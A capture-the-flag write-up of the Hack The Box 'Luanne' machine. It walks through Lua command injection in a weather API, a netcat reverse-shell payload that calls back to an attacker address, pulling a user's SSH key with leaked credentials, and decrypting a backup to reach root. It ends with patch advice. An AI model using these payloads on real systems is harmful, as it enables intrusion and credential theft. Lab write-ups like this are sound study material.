Hackthebox Luanne WriteUp

Overview:

Luanne is an great easy BSD machine. First it comes to a vulnerable lua weather script running on the web server that allows code execution and then there is a backend server running that exposed id_rsa file for the user that by having user’s credentials and using curl to pull the id_rsa key. Last, there is encrypted backup file in the user folded and by using a exist netpgp tool in the box that allows we simply decrypt it and get the root’s password. Although, The concepts of this box are not too complicated but it still requires dedicated enumerations to find a way in. With all that being said, Let’s just jump in!

Reconnaissance:

# Nmap 7.91 scan initiated Thu Mar 25 10:08:15 2021 as: nmap -sC -sV -oN sc -vv 10.10.10.218
Increasing send delay for 10.10.10.218 from 0 to 5 due to 44 out of 145 dropped probes since last increase.
Increasing send delay for 10.10.10.218 from 5 to 10 due to 64 out of 213 dropped probes since last increase.
Nmap scan report for 10.10.10.218
Host is up, received echo-reply ttl 254 (0.19s latency).
Scanned at 2021-03-25 10:08:15 EDT for 205s
Not shown: 997 closed ports
Reason: 997 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey: 
|   3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC1nFqkIP48mPiQbwIS5LLjiwBR+cn31ljUqGmtdlLPEisAgHbcVrGhXbSkUoHHOtUi/qn+yP9SyUHzMDv7WaeKUkmKgFLsin2xiX0VT82nU5RYQ2YTh/WBXeSKEx7g7oMO6L1G3XBJ24Igf3F3z0r3hwjkjAJqtoH27ERq9IUZuvsSlNndjM/Q2G6ZHNwSjqjrS+rddamP91vn0emJZvcDP4tEi3p56isuCB/6I3Gx31ucapzNknY91fZmko6133eIRRpUqnc/Mk3Spv2bMBxhtYHr1FYiwRf1fk9TfdqPWOToA/YzUvXsEGf5EEzVw3FLMdOkJcI8CR3Y510CJ/W+gefPCOs5l1tcqNLJBw1qNBHyzyO0a2Jlm0vU69BiSwpxNyZmLq9QIfPFGHXrw6b0Ul94eFqPzkcxenP+s9N5ZN35TwWJz7MHTrbRY5Rs9iwGZ4zy5F3gSqKWPekNzPESWO+DoJIcgqNzQVplqaOL5yQLQqMJJTudDEUuIqN/1Zk=
|   521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
| ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBAFlwEzim2pzpW7PYcDQB8EQCWPSUxYMK/Tv0fgtPIMkiLepeDQ2WTEdtBnAGRg0CBp6MRM8RR6M+dUeMy9Zm02hpgFjEjNrcXstpm2mS+8axgwxoT2A5F/hkMms6ckkjfMhdLHom+8ZlHPFcX5MWl1cIIuH+A+RGZuJNb6QpEIvguSV/A==
|   256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMDw96/CWlrLxN0y9RAm9LU3MPNEJOYbJlzMxzUutOIQ
80/tcp   open  http    syn-ack ttl 63 nginx 1.19.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=.
| http-methods: 
|_  Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry 
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open  http    syn-ack ttl 63 Medusa httpd 1.12 (Supervisor process manager)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

The foothold:

Port 80

Curl the URL and it redirects to a backend server 127.0.0.1:3000

Port 9001

Default may indicates default credentials?

Google Medusa httpd 1.12 (Supervisor process manager) default credentials and found it in below link.

https://readthedocs.org/projects/supervisor/downloads/pdf/latest/

Supervisor 4.2.0

https://pypi.org/project/supervisor/

Search exploits but found nothing.

Look at the process and there is a weather.lua api running on the web server.

So going to look at port 80, sent it to burp and there is a forecast directory and it has a city parameter.

The error indicates the server is running Lua weather script, By checking GTFBins for lua binary and there is a shell escape function.

GTFOBins

Having tried many command injections, I’ve found the below payload has code execution.

city=list’);os.execute(“id”)--

Reverse shell payload

London’);os.execute(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.x.x 443>/tmp/f”)- -

PriEsc :

curl 10.10.14.28/linpeas.sh -o linpeas.sh

Found passowod iamthebest for webapi_user

login to port 80, but it doesn’t show much information.

Remember before when curled port 80, the page redirects to a backend server port 3000, So check running ports on the machine.

$ ls -l /home
total 4
dr-xr-x---  7 r.michaels  users  512 Sep 16  2020 r.michaels

Use credential of the webapi to curl user r.michaels’s id_rsa

curl --user webapi_user:iamthebest 127.0.0.1:3001/~r.michaels/id_rsa

root@kali:~/htb/boxes/luanne# chmod 600 key.txt
root@kali:~/htb/boxes/luanne# ssh -i key.txt r.michaels@10.10.10.218
Last login: Fri Sep 18 07:06:51 2020
NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020
Welcome to NetBSD!

PriEsc to root:

There is a encrypted backup file, And use netpgp in the machine to extract the file and output it to tmp folder.

netpgp — decrypt evel_backup-2020–09–16.tar.gz.enc — output=/home/r.michaels/backups/test.tar.gz

Found another webapi’s credential So use john to crack it again.

It should be the root’s password, So try su root to it BUT

luanne$ su root
su: You are not listed in the correct secondary group (wheel) to su root.
su: Sorry: Authentication error
luanne$

After searched if there is a alternative way to perform the same and found doas does it.

luanne$ doas su root
Password:
sh: Cannot determine current working directory
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
# whoami & hostname
root
luanne.htb

Patch the vulnerabilities:

1. Fix lua weather script’s line 49’s sanitisation checking to prevent code execution.
2. Remove the id_rsa and other sensitive information from the backend server.
3. Remove the Enc backup file.